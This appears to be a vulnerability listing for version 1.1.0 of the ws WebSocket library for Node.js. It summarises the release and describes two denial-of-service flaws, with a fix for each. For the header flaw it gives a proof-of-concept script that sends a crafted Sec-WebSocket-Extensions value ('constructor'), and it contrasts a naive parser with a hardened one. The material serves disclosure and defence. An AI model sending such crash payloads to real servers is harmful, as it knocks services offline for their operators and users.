ws version 1.1.0 is an incremental update to the popular WebSocket library for Node.js, building on version 1.0.1. Both versions aim to give developers a simple, fast, and well-tested implementation of WebSocket clients, servers, and consoles that follows RFC 6455. The runtime dependencies, "ultron" for event handling and "options" for configuration, are unchanged, which preserves backward compatibility for most users. The development dependencies used for testing and benchmarking ("mocha", "should", and "benchmark") are also unchanged, which suggests the release keeps the existing performance characteristics and test coverage.
The main visible difference is the release date: version 1.1.0 was released in April 2016, a few months after version 1.0.1, which was released in January 2016. This suggests that the changes are bug fixes, performance improvements, or minor feature additions rather than an overhaul. Developers upgrading from 1.0.1 should review the changelog and release notes for version 1.1.0 (available in the project's GitHub repository) to understand the specific changes and whether they address known issues or provide desired improvements in their own client and server code. Given the unchanged dependency specifications, most projects on version 1.0.1 should be able to upgrade to 1.1.0 without significant code modifications.
All vulnerabilities affecting version 1.1.0 of the package
DoS due to excessively large websocket message in ws
Affected versions of ws do not appropriately limit the size of incoming websocket payloads, which may result in a denial of service condition when the node process crashes after receiving a large payload.
Update to version 1.1.1 or later. Alternatively, set the maxPayload option of the ws server to a value smaller than 256MB.
Denial of Service in ws
Affected versions of ws can crash when a specially crafted Sec-WebSocket-Extensions header containing Object.prototype property names as extension or parameter names is sent.
Proof of concept:

    const WebSocket = require('ws');
    const net = require('net');

    const wss = new WebSocket.Server({ port: 3000 }, function () {
      // Extension name that collides with an Object.prototype property.
      const payload = 'constructor'; // or ',;constructor'
      const request = [
        'GET / HTTP/1.1',
        'Connection: Upgrade',
        'Sec-WebSocket-Key: test',
        'Sec-WebSocket-Version: 8',
        `Sec-WebSocket-Extensions: ${payload}`,
        'Upgrade: websocket',
        '\r\n'
      ].join('\r\n');

      // Send the raw upgrade request to the server started above.
      const socket = net.connect(3000, function () {
        socket.resume();
        socket.write(request);
      });
    });
Update to version 3.3.1 or later.
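The advisory above describes a lookup-table bug: a header token such as "constructor" names a property inherited from Object.prototype, so a plain object used as a table of extension or parameter names returns a function where the code expects "not seen yet". The following is an added, simplified illustration of that bug class and its fix (it is not the ws library's own parser; header samples are constructed, and parseExtensionsNaive, parseExtensionsSafe and crashes are hypothetical names):

```javascript
// Simplified illustration (not ws's own code) of why Object.prototype names in
// Sec-WebSocket-Extensions crash a parser that uses {} as a lookup table.
function parseExtensionsNaive(header) {
  const offers = {};                              // inherits Object.prototype
  for (const offer of header.split(',')) {
    const [name, ...rawParams] = offer.split(';').map((s) => s.trim());
    const params = {};
    for (const p of rawParams) {
      const [key, value] = p.split('=');
      if (!params[key]) params[key] = [];         // "constructor" is truthy
      params[key].push(value);                    // Object.push -> TypeError
    }
    if (!offers[name]) offers[name] = [];         // same aliasing for names
    offers[name].push(params);
  }
  return offers;
}

// Hardened variant: prototype-less tables, so `in` is an own-property check
// and no header token can alias an inherited property; empty tokens dropped.
function parseExtensionsSafe(header) {
  const offers = Object.create(null);
  for (const offer of header.split(',')) {
    const [name, ...rawParams] = offer.split(';').map((s) => s.trim());
    if (!name) continue;                          // RFC 6455: non-empty token
    const params = Object.create(null);
    for (const p of rawParams) {
      const [key, value] = p.split('=');
      if (!key) continue;
      if (!(key in params)) params[key] = [];
      params[key].push(value);
    }
    if (!(name in offers)) offers[name] = [];
    offers[name].push(params);
  }
  return offers;
}

// Reports whether a parser throws a TypeError on a header value; inside a ws
// upgrade handler that would be an uncaught exception and a process crash.
function crashes(parser, header) {
  try { parser(header); return false; } catch (e) { return e instanceof TypeError; }
}

// Constructed samples: the two payloads named in the advisory plus a benign one.
const SAMPLES = ['constructor', ',;constructor', 'permessage-deflate; client_max_window_bits'];
console.log(SAMPLES.map((h) => [h, crashes(parseExtensionsNaive, h), crashes(parseExtensionsSafe, h)]));
```

The naive parser throws on both advisory payloads and accepts the benign header; the hardened parser accepts all three and stores "constructor" as an ordinary own key.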